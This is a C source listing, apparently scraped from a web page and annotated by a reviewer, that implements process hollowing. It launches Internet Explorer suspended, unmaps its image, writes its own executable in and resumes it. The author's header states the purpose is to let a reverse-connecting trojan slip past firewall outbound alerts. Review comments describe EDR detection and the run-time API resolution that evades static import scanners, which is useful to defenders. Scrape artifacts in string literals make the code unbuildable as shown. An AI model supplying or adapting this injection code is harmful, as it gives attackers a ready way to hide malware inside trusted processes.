| ????? 直接將自身代碼注入傀儡進程,不需要DLL。首先用CreateProcess來創建一個掛起的IE進程,創建時候就把它掛起。然后得到它的裝載基址,使用函數ZwUnmapViewOfSection來卸載這個這個基址內存空間的數據,。再用VirtualAllocEx來個ie進程重新分配內存空間,大小為要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新寫IE進程的基址,就是剛才分配的內存空間的地址。再用WriteProcessMemory把自己的代碼寫入IE的內存空間。用SetThreadContext設置下進程狀態,最后使用ResumeThread繼續運行IE進程。
/*********************************************************************
 * Author: Polymorphours
 * Date: 2005/1/10
 * Another way of injecting one's own code into a puppet process; the
 * author's stated use is with a reverse-connecting trojan, to avoid the
 * firewall's outbound-connection alert.
 *********************************************************************/
/*
 * NOTE(review): this listing is the textbook "process hollowing" sequence
 * as visible in the code below: CreateProcess(CREATE_SUSPENDED) ->
 * GetThreadContext + ReadProcessMemory of the child's image base ->
 * ZwUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
 * WriteProcessMemory of the whole parent image -> SetThreadContext ->
 * ResumeThread. That exact API chain against a freshly created,
 * still-suspended child is what hollowing detections in EDR / sandbox
 * telemetry key on (a parent writing the child's PEB and a large RWX
 * region before the child has executed a single instruction).
 *
 * Extraction artifacts: the listing was scraped from a web page; the
 * sequences "/r/n" in string literals and '/0' presumably stood for "\r\n"
 * and '\0', and "//" and "?" inside the iexplore.exe path for "\\" and a
 * space. They are reproduced verbatim here; the code is 32-bit, MSVC-only
 * (_asm, fs: segment access) and will not build with a conforming C11
 * compiler as shown.
 */
#include <stdio.h>
#include <windows.h>

/* Unmaps the image mapped at BaseAddr in the target process (see bottom). */
BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr);

typedef struct _ChildProcessInfo {
    DWORD dwBaseAddress;  /* image base read from the suspended child's PEB */
    DWORD dwReserve;      /* never written or read in this listing */
} CHILDPROCESS, *PCHILDPROCESS;

BOOL FindIePath(char *IePath, int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule);
BOOL CreateInjectProcess(PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess);

/* Full path of the puppet executable; filled in by FindIePath() from InjectProcess(). */
char szIePath[MAX_PATH];

/*
 * Entry point. The same executable runs twice: once as the injecting
 * parent (InjectProcess() returns TRUE, prints the test banner) and once
 * as the image copied into the hollowed child, where InjectProcess() sees
 * its module path equal to szIePath and returns FALSE, so the MessageBox
 * ("process injection complete") is the injected "payload". Note that
 * GetModuleHandle(NULL) failing also returns FALSE and reaches that branch.
 */
int main(void)
{
    if (InjectProcess() )
    {
        printf("This is my a test code,made by (Polymorphours)shadow3./r/n");
    }
    else
    {
        MessageBox(NULL,"進程插入完成","Text",MB_OK);
    }
    return 0;
}

/*
 * Builds the hard-coded iexplore.exe path on the system drive.
 * Keeps only the first two characters of the system directory (the drive
 * letter and colon), appends the fixed "Program Files" path and copies the
 * result into IePath. dwBuffSize is never read and IePath's capacity is
 * not checked; the function always returns TRUE.
 * Assumes the drive is the first two characters of the system directory
 * and that the path fits in MAX_PATH — neither is verified here.
 */
BOOL FindIePath(OUT char *IePath, OUT int *dwBuffSize)
{
    char szSystemDir[MAX_PATH];
    GetSystemDirectory(szSystemDir,MAX_PATH);
    szSystemDir[2] = '/0';   /* presumably '\0' in the original; multi-char constant as written */
    lstrcat(szSystemDir,"//Program?Files//Internet Explorer//iexplore.exe");
    lstrcpy(IePath, szSystemDir);
    return TRUE;
}

/*
 * Parent-side driver of the hollowing sequence.
 * Returns FALSE when this image is already running under the puppet's path
 * (i.e. inside the child) or when its own module handle cannot be obtained;
 * otherwise returns TRUE regardless of whether the injection succeeded.
 * The whole in-memory image of the current process (hModule, dwImageSize
 * bytes) is copied into the child without any relocation processing, so
 * the copy only stays valid if VirtualAllocEx hands back the address the
 * parent is itself loaded at (the requested address is hModule).
 */
BOOL InjectProcess(void)
{
    char szModulePath[MAX_PATH];
    DWORD dwImageSize = 0;
    STARTUPINFO si;                 /* unused in this function */
    PROCESS_INFORMATION pi;
    CONTEXT ThreadCxt;
    DWORD *PPEB;
    DWORD dwWrite = 0;
    CHILDPROCESS stChildProcess;
    LPVOID lpVirtual = NULL;
    PIMAGE_DOS_HEADER pDosheader = NULL;
    PIMAGE_NT_HEADERS pVirPeHead = NULL;
    HMODULE hModule = NULL;
    ZeroMemory( szModulePath, MAX_PATH );
    ZeroMemory( szIePath, MAX_PATH );
    GetModuleFileName( NULL, szModulePath, MAX_PATH );
    FindIePath( szIePath, NULL );
    if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) { // already running inside the IE (child) process
        return FALSE;
    }
    hModule = GetModuleHandle( NULL );
    if ( hModule == NULL )
    {
        return FALSE;
    }
    /* Walk own PE headers to find AddressOfEntryPoint / ImageBase later. */
    pDosheader = (PIMAGE_DOS_HEADER)hModule;
    pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
    dwImageSize = GetSelfImageSize(hModule);
    // Start a puppet process in suspended mode; IE is chosen so outbound traffic looks like the browser's
    if ( CreateInjectProcess(&pi, &ThreadCxt, &stChildProcess )) {
        printf("CHILD PID: [%d]/r/n",pi.dwProcessId);
        // Unmap the child's original image so its base range can be reused
        if( UnloadShell(pi.hProcess, stChildProcess.dwBaseAddress) )
        {
            // Re-allocate that range in the child, RWX, at this process's own base address
            lpVirtual = VirtualAllocEx(
                pi.hProcess,
                (LPVOID)hModule,
                dwImageSize,
                MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            if( lpVirtual )
            {
                printf("Unmapped and Allocated Mem Success./r/n");
            }
        }
        else
        {
            printf("ZwUnmapViewOfSection() failed./r/n");
            /* NOTE(review): the suspended child is left alive on this path
             * (no TerminateProcess, handles not closed) and TRUE is returned. */
            return TRUE;
        }
        if(lpVirtual)
        {
            /* Code treats the initial thread's EBX as the child's PEB pointer
             * and dword index 2 (offset 8) as the image base field. */
            PPEB = (DWORD *)ThreadCxt.Ebx;
            // Overwrite the child's recorded image base with the new allocation
            WriteProcessMemory(
                pi.hProcess,
                &PPEB[2],
                &lpVirtual,
                sizeof(DWORD),
                &dwWrite);
            // Copy this process's whole image into the child (headers included, no relocations)
            if ( WriteProcessMemory(
                pi.hProcess,
                lpVirtual,
                hModule,
                dwImageSize,
                &dwWrite) )
            {
                printf("image inject into process success./r/n");
                ThreadCxt.ContextFlags = CONTEXT_FULL;
                /* EAX is set to the copied image's entry point; presumably
                 * the loader picks the start address from EAX at this stage
                 * of a suspended process — confirm, the DEBUG dump prints
                 * EIP but EIP is never changed here. */
                if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
                {
                    ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
                }
                else
                {
                    ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
                }
#ifdef DEBUG
                printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);
                printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);
                printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);
                printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);
                printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);
#endif
                /* Return values of both calls are ignored. */
                SetThreadContext(pi.hThread, &ThreadCxt);
                ResumeThread(pi.hThread);
            }
            else
            {
                printf("WirteMemory Failed,code:%d/r/n",GetLastError());
                TerminateProcess(pi.hProcess, 0);
            }
        }
        else
        {
            printf("VirtualMemory Failed,code:%d/r/n",GetLastError());
            TerminateProcess(pi.hProcess, 0);
        }
    }
    return TRUE;
}

/*
 * Returns the size of this process's own mapped image.
 * MSVC 32-bit inline assembly: reads fs:[0x30], follows +0x0c and +0x0c
 * again, then loads the dword at +0x20 of that entry. Presumably
 * PEB -> Ldr -> first InLoadOrder entry -> SizeOfImage; the offsets are
 * hard-coded and specific to the 32-bit PEB/LDR layout — confirm against
 * the structure definitions. hModule is not used. esi is clobbered.
 */
DWORD GetSelfImageSize(HMODULE hModule)
{
    DWORD dwImageSize;
    _asm
    {
        mov ecx,0x30
        mov eax, fs:[ecx]
        mov eax, [eax + 0x0c]
        mov esi, [eax + 0x0c]
        add esi,0x20
        lodsd
        mov dwImageSize,eax
    }
    return dwImageSize;
}

/*
 * Creates the puppet process suspended and captures what the parent needs
 * to hollow it: the initial thread context (pThreadCxt, CONTEXT_FULL) and
 * the image base read from the child's PEB into pChildProcess->dwBaseAddress.
 * Returns TRUE if CreateProcess succeeded, FALSE otherwise.
 * NOTE(review): STARTUPINFO si is passed uninitialized (no ZeroMemory, cb
 * not set); GetThreadContext and ReadProcessMemory results are unchecked,
 * so dwBaseAddress may be stale on failure. The child's handles in *pi are
 * never closed by any caller in this listing.
 */
BOOL CreateInjectProcess(
    PPROCESS_INFORMATION pi,
    PCONTEXT pThreadCxt,
    CHILDPROCESS *pChildProcess )
{
    STARTUPINFO si;
    DWORD *PPEB;
    DWORD read;
    // Launch IE suspended: its first instruction will not run until ResumeThread
    if( CreateProcess(
        NULL,
        szIePath,
        NULL,
        NULL,
        0,
        CREATE_SUSPENDED,
        NULL,
        NULL,
        &si,
        pi ))
    {
        pThreadCxt->ContextFlags = CONTEXT_FULL;
        GetThreadContext(pi->hThread, pThreadCxt);
        /* EBX of the initial context is used as the PEB address. */
        PPEB = (DWORD *)pThreadCxt->Ebx;
        // Read IE's image base from PEB dword index 2 (offset 8)
        ReadProcessMemory(
            pi->hProcess,
            &PPEB[2],
            (LPVOID)&(pChildProcess->dwBaseAddress),
            sizeof(DWORD),
            &read );
        return TRUE;
    }
    return FALSE;
}

/*
 * Unmaps the view mapped at BaseAddr inside process ProcHnd.
 * ZwUnmapViewOfSection is resolved at run time from ntdll.dll via
 * LoadLibrary/GetProcAddress, so it does not appear in this binary's static
 * import table — import-based static scanners should account for that.
 * Returns TRUE only when the call returns NTSTATUS 0 (success); FALSE if
 * ntdll cannot be loaded, the export is missing, or the call fails.
 * The handle is cast through unsigned long, which is 32-bit specific.
 */
BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr)
{
    typedef unsigned long (__stdcall *pfZwUnmapViewOfSection)(unsigned long, unsigned long);
    pfZwUnmapViewOfSection ZwUnmapViewOfSection = NULL;
    BOOL res = FALSE;
    HMODULE m = LoadLibrary("ntdll.dll");
    if(m) {
        ZwUnmapViewOfSection = (pfZwUnmapViewOfSection)GetProcAddress(m, "ZwUnmapViewOfSection");
        if(ZwUnmapViewOfSection)
            res = (ZwUnmapViewOfSection((unsigned long)ProcHnd, BaseAddr) == 0);
        FreeLibrary(m);
    }
    return res;
}
|